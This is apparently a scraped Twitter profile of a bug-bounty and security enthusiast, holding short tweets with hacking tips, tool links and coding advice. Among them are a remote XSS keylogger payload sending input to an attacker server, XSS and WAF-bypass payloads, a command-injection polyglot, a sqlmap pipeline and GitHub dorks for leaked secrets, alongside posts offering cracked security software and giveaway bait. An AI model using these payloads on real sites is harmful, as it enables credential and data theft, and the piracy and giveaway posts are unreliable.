Dr.FarFar ( VMH0T3P ) Profile Banner
Dr.FarFar ( VMH0T3P ) Profile
Dr.FarFar ( VMH0T3P )

@3XS0

15,382
Followers
5,987
Following
8,597
Media
18,176
Statuses

أَشْهَدُ أَنْ لَا إِلَهَ إِلَّا اللَّهُ وَحْدَهُ لَا شَرِيكَ لَهُ وَأَشْهَدُ أَنَّ مُحَمَّدًا عَبْدُهُ وَرَسُولُهُ Cyber Security 🐱‍💻 ( Retired Hacker )

𓂋𓍿𓀂𓁐𓏥𓈖𓆎𓅓𓏏𓊖
Joined March 2011
Don't wanna be here? Send us removal request.
Pinned Tweet
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
#FREE 2ಠ2ಠ ♥ OS Name : VMH0T3P ( VMware Windows 10 20H2 x64 ) Version : 1.0.0 Author : Dr.FarFar Update : 15 November 2020 Link : #HackerOne #infosec #bugcrowd #bugbountytips #bugbountytip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #BugHunter
Tweet media one
89
224
339
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
I'm feeling generous. I'll send a Burp Suite Pro licence and 10 years Pentesterlab subscription to anyone who replies to this tweet.
1K
89
535
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
So I just learnt that "place-items" is the shorthand property of "align-items" and "justify-content"! Which means I can now align vertically and horizontally in the same line! What a time to be alive! 😱😱😱 #100DaysOfCode #css
Tweet media one
8
125
418
@3XS0
Dr.FarFar ( VMH0T3P )
2 years
CTF + Digital Forensics + IoT/IIoT + Malware Analysis + Network & System Administration + OSINT-GLOBAL (Non-US) + OSINT-US + Pen Testing / Red Team + Programming + Sighlent's Sources + Threat Hunting #Dr_FarFar #infosec #Hackers #bugbounty #cybersecurity
Tweet media one
11
122
362
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
📚 Awesome note-taking for Hackers 💥 just released ! A curated list of apps & plugins for pentest reporting, bug-bounty notes & building your hacking knowledge base #infosec #cybersecurity #hacking #bugbounty #pentest
Tweet media one
Tweet media two
6
125
306
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
I’ve just hit my #BugBounty goal of 250k USD for this year 😊🦄
12
5
235
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
SSRF TIP: Look deeper for better results, Here is a way to look deep. #bugbounty #hacking #ssrf
Tweet media one
5
90
185
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Hetty:-- #http toolkit for security research. It aims to become an open-source alternative to commercial software like Burp Suite Pro, with powerful features tailored to the needs of the infosec and bug bounty community. #Download #Link :-
0
53
169
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
8
63
152
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Identifying Vulnerabilities in SSL/TLS and Attacking them #SSL #DenialOfServiceAttack #Vulnerability #Infosec
Tweet media one
Tweet media two
0
40
135
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
3
61
129
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
assetfinder | waybackurls | grep -E "\.json(?:onp?)?$" | anew #bugbounty #bugbountytips #kingofbugbounty
Tweet media one
2
25
126
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
XSS in Jenzabar (CVE-2021-26723) POC: /ics?tool=search&query="><script>alert('xss')</script> #XSS
Tweet media one
1
45
126
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Here are some of the shortest XSS payloads I could find!
Tweet media one
1
22
115
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
⚡️Broken Access Control - Access to sensitive data ⚡️ #bugbounty #bugbountytips
Tweet media one
1
46
108
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
A little old but helpful, top 30 #Nmap Command Examples For Sys/Network Admins  … #linux #sysadmin #network
0
41
105
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
🚨 New CloudFlare XSS Bypass! 🚨 <svg onload=alert%26%230000000040"1")> #XSS #BugBounty #BugBountyTips
Tweet media one
2
35
105
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Hetty:-- #http toolkit for security research. It aims to become an open-source alternative to commercial software like Burp Suite Pro, with powerful features tailored to the needs of the infosec and bug bounty community. #Download #Link :-
0
32
100
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
I made a list of vulnerabilities to look out for, while doing bug hunting ... 🪲🐞 Comment down if you find other than in the list😋 #100daystolearnandimprove #bugbountytips #bugbounty
Tweet media one
5
42
94
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Account takeover using password reset Got other ideas? Comment them below #cybersecurity #infosec #bugbounty #bugbountytips #bugbountytip #hacking
Tweet media one
3
51
93
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
I started with HTML, CSS, & Javascript Countless hours studying Made tons of projects Networked a lot No CS Degree Became a software engineer. You are at your beginning! Don't let your circumstances define your destination.🙏🏽❤️ #100DaysOfCode #CodeNewbie
3
42
87
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Microsoft SharePoint SSI / ViewState Remote Code Execution #SharePoint #RCE #CVE #CyberSecurity #Infosec
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
37
87
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
10 𝗬𝗼𝘂𝗧𝘂𝗯𝗲 channel to learn programming in 𝟮𝟬𝟮𝟬: 1|TheNewBoston 2| Derek Banas 3| ProgrammingKnowledge 4| Traversy media 5| Edureka 6| LearnCode 7| Hitesh Choudhary 8| Design course 9| TreeHouse 10| CleverProgrammer #100DaysOfCode #CodeNewbie #YouTuber
6
33
79
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
🔥 Fire tip aims to inject and get get SSRF,RCE,SQLi,XSS or SSTI in oneshot \\yourhost?;sleep${IFS}10;'/*!90000or*/+/*"><%00svg/onload=confirm`{{8*8}}`>*/'1 🔥👑 #KingOfBugBountyTips #bugbounty #bugbountytip #github #sqlinjection #KingOfJokes
Tweet media one
0
47
78
@3XS0
Dr.FarFar ( VMH0T3P )
5 years
I have extra funds, so I've decided to give $300 to everyone who likes and retweet this tweet. Not missing anyone. You can make money like me by e-marketing Just download free software from Please follow so I can message you with payment details. Thanks
Tweet media one
31
39
69
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Repo containing a docker image for automating subdomains enumeration/resolving! The integrated tools include: - Sublist3r - Subfinder - Amass - OneForAll - Asset Finder - Findomain - MassDNS docker run -it uexpl0it/subdomains-enumerator:0.4 #BugBounty
1
47
77
@3XS0
Dr.FarFar ( VMH0T3P )
10 months
بعد إغلاق حسابي على لينكدان المنصة الغير مهنية قررت استكمال النشر على تويتر #FreePalestine
Tweet media one
4
3
76
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
#FREE 2ಠ22 ♥ xRay Web Vulnerability Scanner Advanced v1.8.4 x64 Full Activated - Discount 100% OFF Link : #BurpSuite #bugcrowd #bugbountytips #bugbountytip #MobileSecurity #CyberSecurity #EthicalHacking #100DaysOfCode #Malware
Tweet media one
0
32
65
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
I'm feeling generous. I'll send a Burp Suite Pro licence and 10 years Pentesterlab subscription to anyone who retweets to this tweet and follow me. 🔥🥇💪🖥️ #bugbountytips #BugBounty #CodeNewbies #100DaysOfCode
17
120
63
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
GiHub Dorks for Finding API Keys, Tokens and Passwords api_key “api keys” authorization_bearer: oauth auth authentication client_secret api_token: “api token” client_id password user_password user_pass passcode client_secret secret password hash OTP user auth #bugbountytips
0
22
67
@3XS0
Dr.FarFar ( VMH0T3P )
6 years
Bypass Facebook Privacy For Get Users Accounts Data Details ( Get Users Secret information Data 'Only Me' ) 💪😎 Thanks @Facebook #Dr_FarFar #Facebook #BugBounty
Tweet media one
Tweet media two
Tweet media three
13
7
61
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
A small demo how to brute HTTP Basic Auth with BurpSuite #BugBounty #BurpSuite #BugBountyTip
1
23
58
@3XS0
Dr.FarFar ( VMH0T3P )
10 months
It seems there are some people online impersonating me and trying to scam people out of money by promising to offer a special version of my site's tools. Keep in mind that I'm not and never will do this. #Dr_FarFar #inFoSec #inFoSys #Hacker #BugBounty
Tweet media one
9
1
61
@3XS0
Dr.FarFar ( VMH0T3P )
8 years
💘 أمي 💘 #هرمون_السعاده_بالنسبه_لي
9
5
45
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
Where are you all from? 🇦🇨🇦🇩🇦🇪🇦🇫🇦🇬🇦🇮🇦🇱🇦🇺🇦🇹🇦🇸🇦🇷🇦🇶🇦🇴🇦🇲🇦🇼🇦🇽🇦🇿🇧🇧🇧🇩🇧🇪🇧🇲🇧🇱🇧🇯🇧🇮🇧🇭🇧🇬🇧🇫🇧🇳🇧🇴🇧🇶🇧🇷🇧🇸🇧🇹🇧🇻🇨🇫🇵🇸🇨🇦🇧🇿🇧🇾🇧🇼🇨🇬🇨🇭🇨🇮🇨🇰🇨🇱🇨🇲🇨🇳🇨🇺🇨🇷🇨🇵🇨🇴🇨🇾🇨🇿🇩🇪🇩🇬🇩🇯🇩🇰🇩🇲🇪🇷🇪🇬🇪🇪🇪🇨🇪🇦🇩🇿🇩🇴🇪🇸🇪🇹🇪🇺🇫🇮🇫🇲🇬🇫🇬🇪🇬🇩🇬🇧🇫🇷🇫🇴🇬🇬🇬🇭🇬🇮🇬🇱🇬🇼🇬🇺🇬🇹🇬🇸🇬🇷🇬🇶🇭🇲🇭🇳🇭🇷🇭🇹🇭🇺🇮🇨🇮🇶🇮🇴🇮🇳🇮🇲🇮🇪🇮🇩🇮🇷🇮🇸🇮🇹🇯🇪🇯🇲🇯🇴🇯🇵🇰🇵🇰🇳🇰🇪🇰🇷🇰🇼🇰🇾🇰🇿🇱🇦🇱🇧🇱🇨🇱🇻🇱🇺🇱🇹🇱🇸🇱🇷🇱🇮🇱🇾🇲🇦🇲🇫🇲🇬🇸🇩🇾🇪🇺🇲
66
0
56
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Reverse Engineering Malware, Part 1: Getting Started Reversing #reverseengineering #reversing #malware #cybersecurity #cyberwarrior
Tweet media one
1
25
55
@3XS0
Dr.FarFar ( VMH0T3P )
1 month
@_WalidTaha مهما كان تخصصك لازم تتعلم تسويق الكتروني هتقدر تسوق لشغلك ولنفسك صح 😎
2
0
56
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
A small Burpsuite trick which helped me to find Blind SSRF - Step 1: Use Intruder to Bruteforce Headers Step 2: Add Burp collaborator URL as value. Step 3: Add prefix numerical payload (Pitchfork) Step 4: Use Tarborator Extension to monitor hits #bugbounty #bugbountytips
Tweet media one
Tweet media two
4
24
52
@3XS0
Dr.FarFar ( VMH0T3P )
1 year
Tweet media one
5
12
46
@3XS0
Dr.FarFar ( VMH0T3P )
1 month
If you see PUT method. Don't worry! Change PUT to POST and try for CSRF. Sometimes this happens : #bugbountytips #bugbounty #infosec #hacking #Dr_FarFar
@bugraeskici
Bugra Eskici
5 years
If you see PUT method. Don't worry! Change PUT to POST and try for CSRF. Sometimes this happens : #bugbountytips #bugbounty #infosec #hacking
Tweet media one
10
100
365
3
4
47
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
misconfiguration in handle emails of gmail in many companies, the impact depends on many factors.. #bugbountytips #bugbounty #bugbountytip
Tweet media one
5
8
48
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
CORS Vulnerability Writeups|Pls Share good Writeups/Reports in comments :) #bugbounty #bugbountytip #cybersecurity #bugbountytips
Tweet media one
0
12
47
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
If you like XSS, and do not know where to start WAF Bypassing, here is a link for you: A lot of people are focusing on bypassing the HTML blockers but not the Javascript. This link can give you at least 3 powerful WAF bypasses 🤟
0
12
45
@3XS0
Dr.FarFar ( VMH0T3P )
5 years
Not A Human 👽 Just Cyber Security Tweets Re-Poster Bot 🤖
3
2
40
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Validate your email address with the payload you can here: And find the reference to RFC822 as well. Helped me to find a plenty of nice bugs :) #bugbounty #bugbountytip #bugbountytips
Tweet media one
1
32
47
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
WEB APPLICATION VULNERABILITIES ( Information Disclosure Vulnerabilities ) Dotenv (.env) File Severity (HIGH) HQ Link: #inFoSEC #CyberSecurity #inFormationSecurity #CTF #Dr_FarFar #BlueTeam #RedTeam #BugBountyTip #BugBountyTips #BugBounty #Hacking
Tweet media one
3
27
43
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
1
54
42
@3XS0
Dr.FarFar ( VMH0T3P )
5 years
CVE-2020-2551 Weblogic RCE with iiop protocol For 12.1.3 & 12.2.1.4
2
13
43
@3XS0
Dr.FarFar ( VMH0T3P )
9 months
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| | Dr.FarFar | |_________________________________| \ (•◡•) / \ / —— | | |_ |_
4
2
43
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Spring Boot Vulnerability (to be continued....) #Vulnerability #JNDIinjection #CyberSecurity #Infosec
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
20
42
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
PRO Tip: Learn Python to automate #bugbounty with this (currently) free book by Syed Abuthahir #bugbountytips
3
17
44
@3XS0
Dr.FarFar ( VMH0T3P )
5 years
أول شخص عربي أحببت الهندسة العكسية من خلال كتاباته جمعان عبدالله البريكي ( JAAS ) ♥ رحمك الله ورحم والديك آمين
10
1
37
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
find sql injection subfinder -d target | tee -a domains cat domain | httpx | tee -a alive.txt cat alive.txt | waybackurls | tee -a urls gf sqli urls >> sqli sqlmap -m sqli --dbs --batch happy hacking #bugbountytip #BugBounty
0
18
43
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
0
21
41
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
0
27
39
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
0
49
36
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
0
39
35
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
BugBountyTip: Check if Android Webview has "setAllowUniversalAccessFromFileURLs" set to true. With the ability to load URLs in Webview, you can bypass SOP and steal files from the application sandbox. You can then use XHR to send files to the remote domain. #bugbounty #Android
Tweet media one
0
14
42
@3XS0
Dr.FarFar ( VMH0T3P )
1 month
Bypassed Your Web Application Firewall (WAF) #bugbountytips #BugBounty #bugbountytip #Dr_FarFar
Tweet media one
4
1
41
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
10
50
34
@3XS0
Dr.FarFar ( VMH0T3P )
10 months
Tweet media one
7
5
40
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
1
31
35
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS
0
17
39
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
4
42
34
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Metasploit Basics for Hackers, Part 13: Exploiting Android Mobile Devices #android #metasploit4hackers #metasploit #cybersecurity #cyberwarrior
Tweet media one
0
19
37
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
AuthMatrix - A Burp Suite Extension That Provides A Simple Way To Test Authorization
0
13
39
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Web development learning path: * HTML * CSS * JavaScript * Command Line * Git * React / Vuejs * Nodejs * MongoDB #100DaysOfCode
2
17
38
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Programming is hard. Learning a new language is hard! Learning to think in a new way is hard! Creating an application from nothing is hard! Facing these errors and finding solutions is hard! But it is ABSOLUTELY possible! You got this! #100DaysOfCode #javascript #CodeNewbie
0
21
37
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
6
25
32
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
0
10
35
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
In Javascript, if you need to round down a float, you can use Math.floor, but what if the number can be negative? Doing Math.floor on -2.5 will round down to -3. Maybe, what you really want is Math.trunc, which will always just remove any decimal. #100DaysOfCode #javascript
Tweet media one
1
11
33
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
Threat Actor Group Using UAC Bypass Module To Run BAT File #Pentesting #Bypass #Module #CyberSecurity #Infosec
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
23
34
@3XS0
Dr.FarFar ( VMH0T3P )
9 months
أقسم بالله صراع داخلي بحاول النجاه منه 👿 اللهم ارحمني واهدني 😢
2
2
34
@3XS0
Dr.FarFar ( VMH0T3P )
5 years
Tweet media one
4
12
30
@3XS0
Dr.FarFar ( VMH0T3P )
1 year
Tweet media one
10
8
29
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Busy Dev? 👩‍💻🧑‍💻   curates and lists the latest and greatest developer articles available. 👌 #100daysofcode #codenewbie #javascript #dev #php #VueJS #reactjs
1
17
32
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
#FREE 2ಠ21 ♥ xRay Web Vulnerability Scanner Advanced v1.7.1 x64 Full Activated - Discount 100% OFF Link : #BurpSuite #bugcrowd #bugbountytips #bugbountytip #MobileSecurity #CyberSecurity #EthicalHacking #100DaysOfCode #Malware
Tweet media one
0
19
30
@3XS0
Dr.FarFar ( VMH0T3P )
2 years
#FREE 2ಠ23 ♥ Metasploit Pro 4.22.0-2023013001 Full Activated - CyberSecurity Tools - Discount 100% OFF Link: #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
Tweet media one
0
6
34
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
This Firefox only vector requires a right click. Now on our XSS cheat sheet.
Tweet media one
0
21
33
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
For those that that don't have it and need it. Python pentest cheat sheet. #tech #PenTest #Python #pythonprogramming #CodingTips #CyberSecurity #infosec
Tweet media one
3
27
31
@3XS0
Dr.FarFar ( VMH0T3P )
5 years
PhoneSploit - Using Open Adb Ports We Can Exploit A Device #IoT #IoTSecurity #MobileSecurity  …
0
9
30
@3XS0
Dr.FarFar ( VMH0T3P )
3 years
Tweet media one
2
23
30
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Goodbye To All Stealth Programs And Tools 😏 🕵️‍♂️ Soon 🕵️‍♂️ 🥷 VMH0T3P Secret Maze 🥷 💪( The Curse of the Pharaohs )💪 Incognito in more than 50 Countries in the same time, Move between them in a jiffy, Bypass Websites Blocking Penetration Testing Scanners #Bugbountytips #Malware
Tweet media one
10
2
30
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
0
15
31
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
Tweet media one
0
28
30
@3XS0
Dr.FarFar ( VMH0T3P )
4 years
#FREE 2ಠ2ಠ ♥ Burp Suite Professional Edition v2020.7 x64 Full Activated + All Addons – Discount 100% Link : #BurpSuite #HackerOne #infosec #Hackers #KaliLinux #bugbounty #Security #Synack #hackerone #bugcrowd #whitehat #XSS #it
Tweet media one
2
11
29